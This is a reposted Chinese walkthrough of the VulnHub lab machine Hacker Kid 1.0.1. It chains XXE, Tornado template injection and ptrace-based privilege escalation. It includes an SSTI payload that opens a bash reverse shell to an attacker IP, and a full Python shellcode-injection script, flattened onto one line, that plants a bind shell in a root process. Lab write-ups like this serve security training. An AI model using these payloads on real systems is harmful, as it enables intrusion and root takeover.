當(dāng)前位置：首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

【HACKER KID: 1.0.1靶机】

發(fā)布時(shí)間：2024/1/1 编程问答 29 豆豆

生活随笔收集整理的這篇文章主要介紹了【HACKER KID: 1.0.1靶机】小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

信息搜集

開啟靶機(jī)。

使用nmap掃描，發(fā)現(xiàn)存活靶機(jī)，192.168.85.145，靶機(jī)開放端口為53，80，9999。
進(jìn)一步搜集下對(duì)應(yīng)段開啟的服務(wù)。

發(fā)現(xiàn)，9999端口開啟的是tornado服務(wù)。
先打開web網(wǎng)站，看下。

好像再提示挖掘？還是使用dig工具？先放下，繼續(xù)搜集信息。

#app.html頁(yè)面源碼，發(fā)現(xiàn)存在提示，給了一個(gè)參數(shù)。這個(gè)參數(shù)應(yīng)該是頁(yè)面數(shù)，先嘗試下。

發(fā)現(xiàn)page_no=21時(shí)，返回?cái)?shù)據(jù)不同。

提示我們這個(gè)網(wǎng)站還綁定了一個(gè)域名，先添加到/etc/hosts文本中。

網(wǎng)站首頁(yè)不是提示我們dig嗎，嘗試下，是不是該地址還存在一些未發(fā)現(xiàn)的東西？比如其它子域名？

結(jié)合一開始信息搜集到的53端口，瞬間思路清晰了。

發(fā)現(xiàn)確實(shí)還存在一個(gè)子域，hackerkid.blackhat.local。先將域名添加到/etc/hosts文件上。

發(fā)現(xiàn)存在一個(gè)創(chuàng)建賬號(hào)的頁(yè)面，先嘗試提交下信息。

發(fā)現(xiàn)，是xml格式進(jìn)行的信息交互。盲猜可能存在xxe漏洞。

發(fā)現(xiàn)確實(shí)存在xxe漏洞。

發(fā)現(xiàn)saket用戶權(quán)限除root外最高，查看下saket用戶目錄中是否存在.ssh，.bashrc文件。

發(fā)現(xiàn)saket用戶目錄下確實(shí)存在.bashrc文件。

發(fā)現(xiàn)登錄用戶和密碼。但現(xiàn)在存在的問(wèn)題是這是什么地方的賬號(hào)密碼？
目前還有兩個(gè)端口未使用，53端口以及9999端口，但53端口是bind服務(wù)，也就是dns解析服務(wù)。也就是說(shuō)只剩下9999端口，并且發(fā)現(xiàn)tornado服務(wù)，此處9999端口對(duì)應(yīng)的也應(yīng)該是一個(gè)web服務(wù)。

打開后發(fā)現(xiàn)，此處正好有一個(gè)登陸頁(yè)面，想到剛才搜集到的用戶名和密碼，嘗試下。
admin:Saket!#$%@!!

登陸失敗。。。。。難受。。。。
但想到密碼應(yīng)該是正確的，那么就是用戶名出現(xiàn)問(wèn)題了，想到剛才看到的/etc/hosts文件中的用戶信息saket，本來(lái)賬號(hào)密碼就是在saket用戶下發(fā)現(xiàn)，那么此處的登錄名是否就是saket，那就先嘗試下。

成功登錄進(jìn)去，并且發(fā)現(xiàn)提示，告訴網(wǎng)站name，那么是否是get型或post型傳參。

經(jīng)過(guò)測(cè)試，此處使用的name傳參是get型，那么下一步怎么做呢？
此時(shí)想到這個(gè)網(wǎng)站使用的是tornado服務(wù)，那么是否存在服務(wù)型漏洞？

在先知社區(qū)中進(jìn)行搜索tornado服務(wù)，發(fā)現(xiàn)該服務(wù)存在ssti漏洞。

使用ssti漏洞exp進(jìn)行測(cè)試，出現(xiàn)報(bào)錯(cuò)，發(fā)現(xiàn)該服務(wù)使用的python3。

經(jīng)過(guò)測(cè)試，可以使用bash指令反彈會(huì)話.

{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.85.128/4444 0>&1"')}}

nc成功接收到會(huì)話。

提權(quán)

使用linpeas.sh跑一下

找到提權(quán)腳本。

# inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script. # GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c import ctypes import sys import struct# Macros defined in <sys/ptrace.h> # https://code.woboq.org/qt5/include/sys/ptrace.h.htmlPTRACE_POKETEXT = 4 PTRACE_GETREGS = 12 PTRACE_SETREGS = 13 PTRACE_ATTACH = 16 PTRACE_DETACH = 17# Structure defined in <sys/user.h> # https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_structclass user_regs_struct(ctypes.Structure):_fields_ = [("r15", ctypes.c_ulonglong),("r14", ctypes.c_ulonglong),("r13", ctypes.c_ulonglong),("r12", ctypes.c_ulonglong),("rbp", ctypes.c_ulonglong),("rbx", ctypes.c_ulonglong),("r11", ctypes.c_ulonglong),("r10", ctypes.c_ulonglong),("r9", ctypes.c_ulonglong),("r8", ctypes.c_ulonglong),("rax", ctypes.c_ulonglong),("rcx", ctypes.c_ulonglong),("rdx", ctypes.c_ulonglong),("rsi", ctypes.c_ulonglong),("rdi", ctypes.c_ulonglong),("orig_rax", ctypes.c_ulonglong),("rip", ctypes.c_ulonglong),("cs", ctypes.c_ulonglong),("eflags", ctypes.c_ulonglong),("rsp", ctypes.c_ulonglong),("ss", ctypes.c_ulonglong),("fs_base", ctypes.c_ulonglong),("gs_base", ctypes.c_ulonglong),("ds", ctypes.c_ulonglong),("es", ctypes.c_ulonglong),("fs", ctypes.c_ulonglong),("gs", ctypes.c_ulonglong),]libc = ctypes.CDLL("libc.so.6")pid=int(sys.argv[1])# Define argument type and respone type. libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p] libc.ptrace.restype = ctypes.c_uint64# Attach to the process libc.ptrace(PTRACE_ATTACH, pid, None, None) registers=user_regs_struct()# Retrieve the value stored in registers libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))print("Instruction Pointer: " + hex(registers.rip))print("Injecting Shellcode at: " + hex(registers.rip))# Shell code copied from exploit db. shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"# Inject the shellcode into the running process byte by byte. for i in xrange(0,len(shellcode),4):# Convert the byte to little endian.shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')shellcode_byte=int(shellcode_byte_little_endian,16)# Inject the byte.libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)print("Shellcode Injected!!")# Modify the instuction pointer registers.rip=registers.rip+2# Set the registers libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))print("Final Instruction Pointer: " + hex(registers.rip))# Detach from the process. libc.ptrace(PTRACE_DETACH, pid, None, None)

上傳到靶機(jī)上。
使用ps -aux | grep root
獲取到root用戶權(quán)限執(zhí)行的進(jìn)程。
使用python2 shellcode.py root進(jìn)程號(hào)。
netstat -anltp | grep 5600
獲取是否成功注入進(jìn)程。

下一步使用nc直接連接到靶機(jī)5600端口即可。

成功建立連接。

ok，游戲結(jié)束。

參考鏈接

python Capabilities cap_sys_ptrace+ep提權(quán):http://t.zoukankan.com/zlgxzswjy-p-15185591.html.
linpeas.sh:https://github.com/carlospolop/PEASS-ng/releases/tag/20220522.
ssti模板注入:https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#tornado-python.
dig詳細(xì)使用教程:https://blog.csdn.net/smli_ng/article/details/105921859.
vulnhub之Hacker_Kid-v1.0.1:https://blog.csdn.net/qwweggfe/article/details/119861584.
HACKER KID: 1.0.1下載地址:https://www.vulnhub.com/entry/hacker-kid-101,719/.

總結(jié)

以上是生活随笔為你收集整理的【HACKER KID: 1.0.1靶机】的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。